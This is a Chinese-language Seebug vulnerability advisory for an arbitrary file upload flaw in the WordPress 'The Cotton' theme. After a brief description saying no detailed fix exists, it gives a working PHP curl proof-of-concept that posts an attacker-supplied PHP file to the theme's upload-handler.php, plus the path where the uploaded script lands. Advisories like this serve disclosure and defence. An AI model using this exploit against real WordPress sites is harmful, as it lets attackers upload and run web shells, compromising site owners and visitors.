WordPress The Cotton Theme任意文件上传漏洞

2014-03-07T00:00:00
ID SSV:61703
Type seebug
Reporter Root
Modified 2014-03-07T00:00:00

Description

Bugtraq ID:65958

WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。

WordPress The Cotton Theme不正确过滤用户提交的上传文件,允许远程攻击者利用漏洞提交特制的文件,并以WEB权限执行。 0 WordPress The Cotton Theme 目前没有详细解决方案提供: http://www.wordpress.org

                                        
                                            
                                                <?php
$uploadfile="IeDb.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/thecotton_v114/lib/utils/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>
 
http://127.0.0.1/wordpress/wp-content/uploads/2014/2/upload.php